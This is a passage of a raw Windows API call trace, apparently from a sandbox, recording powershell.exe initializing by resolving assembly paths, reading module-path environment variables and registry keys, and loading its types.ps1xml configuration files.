lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.311] SetConsoleCtrlHandler (HandlerRoutine=0x28d677c, Add=1) returned 1 [0133.343] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c [0133.347] CoCreateGuid (in: pguid=0xcdb50 | out: pguid=0xcdb50*(Data1=0xf94cb609, Data2=0xded2, Data3=0x44a5, Data4=([0]=0x98, [1]=0xed, [2]=0x80, [3]=0x16, [4]=0xab, [5]=0x54, [6]=0x73, [7]=0xf7))) returned 0x0 [0133.352] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.352] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.352] CoTaskMemFree (pv=0x10ccc0) [0133.611] WinSqmIsOptedIn () returned 0x0 [0133.612] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.612] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.612] CoTaskMemFree (pv=0x10ccc0) [0133.619] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.619] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.619] CoTaskMemFree (pv=0x10ccc0) [0133.620] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.620] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.620] CoTaskMemFree (pv=0x10ccc0) [0133.623] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.623] CoTaskMemFree (pv=0x10ccc0) [0133.625] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.625] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.625] CoTaskMemFree (pv=0x10ccc0) [0133.653] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.654] CoTaskMemFree (pv=0x10ccc0) [0133.656] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.656] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.656] CoTaskMemFree (pv=0x10ccc0) [0133.658] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.658] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.658] CoTaskMemFree (pv=0x10ccc0) [0133.662] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.662] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.662] CoTaskMemFree (pv=0x10ccc0) [0133.706] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.706] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.706] CoTaskMemFree (pv=0x10ccc0) [0133.713] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.713] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.713] CoTaskMemFree (pv=0x10ccc0) [0133.714] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.714] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.714] CoTaskMemFree (pv=0x10ccc0) [0134.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.128] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0134.128] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33 [0134.128] CoTaskMemFree (pv=0x10ccc0) [0134.134] CoTaskMemAlloc (cb=0xcc) returned 0x1b80ca50 [0134.134] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b80ca50, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0134.135] CoTaskMemFree (pv=0x1b80ca50) [0134.135] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd6c8 | out: phkResult=0xcd6c8*=0x324) returned 0x0 [0134.135] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd64c, lpData=0x0, lpcbData=0xcd648*=0x0 | out: lpType=0xcd64c*=0x2, lpData=0x0, lpcbData=0xcd648*=0x6c) returned 0x0 [0134.135] CoTaskMemAlloc (cb=0x70) returned 0x1487c0 [0134.135] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd61c, lpData=0x1487c0, lpcbData=0xcd618*=0x6c | out: lpType=0xcd61c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xcd618*=0x6c) returned 0x0 [0134.135] CoTaskMemFree (pv=0x1487c0) [0134.135] CoTaskMemAlloc (cb=0xcc) returned 0x1b80ca50 [0134.135] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b80ca50, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0134.135] CoTaskMemFree (pv=0x1b80ca50) [0134.136] CoTaskMemAlloc (cb=0xcc) returned 0x1b80ca50 [0134.136] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b80ca50, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0134.136] CoTaskMemFree (pv=0x1b80ca50) [0134.139] RegCloseKey (hKey=0x324) returned 0x0 [0134.139] CoTaskMemAlloc (cb=0xcc) returned 0x1b80ca50 [0134.139] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b80ca50, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0134.139] CoTaskMemFree (pv=0x1b80ca50) [0134.139] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd6c8 | out: phkResult=0xcd6c8*=0x324) returned 0x0 [0134.139] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd64c, lpData=0x0, lpcbData=0xcd648*=0x0 | out: lpType=0xcd64c*=0x0, lpData=0x0, lpcbData=0xcd648*=0x0) returned 0x2 [0134.139] RegCloseKey (hKey=0x324) returned 0x0 [0134.174] CoTaskMemAlloc (cb=0x20c) returned 0x15bfe0 [0134.174] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x15bfe0 | out: pszPath="C:\\Users\\aDU0VK IWA5kLS\\Documents") returned 0x0 [0134.175] CoTaskMemFree (pv=0x15bfe0) [0134.175] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Documents", nBufferLength=0x105, lpBuffer=0xcd250, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Documents", lpFilePart=0x0) returned 0x21 [0134.176] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\aDU0VK IWA5kLS\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1 [0134.187] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0134.187] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0134.187] CoTaskMemFree (pv=0x10ccc0) [0134.190] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0134.190] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0134.190] CoTaskMemFree (pv=0x10ccc0) [0134.215] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0134.215] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0134.215] CoTaskMemFree (pv=0x10ccc0) [0134.215] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0134.215] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0134.215] CoTaskMemFree (pv=0x10ccc0) [0134.220] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd4b8 | out: phkResult=0xcd4b8*=0x32c) returned 0x0 [0134.224] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0xcd4cc, lpData=0x0, lpcbData=0xcd4c8*=0x0 | out: lpType=0xcd4cc*=0x1, lpData=0x0, lpcbData=0xcd4c8*=0x74) returned 0x0 [0134.225] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0xcd43c, lpData=0x0, lpcbData=0xcd438*=0x0 | out: lpType=0xcd43c*=0x1, lpData=0x0, lpcbData=0xcd438*=0x74) returned 0x0 [0134.225] CoTaskMemAlloc (cb=0x78) returned 0x1487c0 [0134.225] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0xcd40c, lpData=0x1487c0, lpcbData=0xcd408*=0x74 | out: lpType=0xcd40c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd408*=0x74) returned 0x0 [0134.225] CoTaskMemFree (pv=0x1487c0) [0134.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xcd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0134.225] SetErrorMode (uMode=0x1) returned 0x1 [0134.225] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xcd390 | out: lpFileInformation=0xcd390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0134.225] SetErrorMode (uMode=0x1) returned 0x1 [0134.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0134.228] SetErrorMode (uMode=0x1) returned 0x1 [0134.228] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd390 | out: lpFileInformation=0xcd390*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0134.229] SetErrorMode (uMode=0x1) returned 0x1 [0134.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0134.235] SetErrorMode (uMode=0x1) returned 0x1 [0134.235] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd390 | out: lpFileInformation=0xcd390*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0134.236] SetErrorMode (uMode=0x1) returned 0x1 [0134.249] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0134.249] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0134.249] CoTaskMemFree (pv=0x10ccc0) [0134.258] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0134.258] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0134.258] CoTaskMemFree (pv=0x10ccc0) [0134.259] GetACP () returned 0x4e4 [0134.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0134.285] SetErrorMode (uMode=0x1) returned 0x1 [0134.286] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330 [0134.287] GetFileType (hFile=0x330) returned 0x1 [0134.287] SetErrorMode (uMode=0x1) returned 0x1 [0134.287] GetFileType (hFile=0x330) returned 0x1 [0134.289] ReadFile (in: hFile=0x330, lpBuffer=0x2d3ae28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3ae28*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.293] ReadFile (in: hFile=0x330, lpBuffer=0x2d3ae28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3ae28*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.294] ReadFile (in: hFile=0x330, lpBuffer=0x2d3ae28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3ae28*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.294] ReadFile (in: hFile=0x330, lpBuffer=0x2d3ae28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3ae28*, lpNumberOfBytesRead=0xcd2c8*=0xcf3, lpOverlapped=0x0) returned 1 [0134.294] ReadFile (in: hFile=0x330, lpBuffer=0x2d3a283, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3a283*, lpNumberOfBytesRead=0xcd2c8*=0x0, lpOverlapped=0x0) returned 1 [0134.294] ReadFile (in: hFile=0x330, lpBuffer=0x2d3ae28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3ae28*, lpNumberOfBytesRead=0xcd2c8*=0x0, lpOverlapped=0x0) returned 1 [0134.297] CloseHandle (hObject=0x330) returned 1 [0134.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0134.302] SetErrorMode (uMode=0x1) returned 0x1 [0134.302] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd240 | out: lpFileInformation=0xcd240*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0134.303] SetErrorMode (uMode=0x1) returned 0x1 [0134.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0134.305] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd328 | out: phkResult=0xcd328*=0x330) returned 0x0 [0134.305] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd2ac, lpData=0x0, lpcbData=0xcd2a8*=0x0 | out: lpType=0xcd2ac*=0x1, lpData=0x0, lpcbData=0xcd2a8*=0x56) returned 0x0 [0134.305] CoTaskMemAlloc (cb=0x5a) returned 0x1bd890 [0134.305] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd27c, lpData=0x1bd890, lpcbData=0xcd278*=0x56 | out: lpType=0xcd27c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd278*=0x56) returned 0x0 [0134.306] CoTaskMemFree (pv=0x1bd890) [0134.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0134.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0134.382] GetSystemInfo (in: lpSystemInfo=0xcbf60 | out: lpSystemInfo=0xcbf60*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0134.382] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.415] GetFullPathNameW (in: 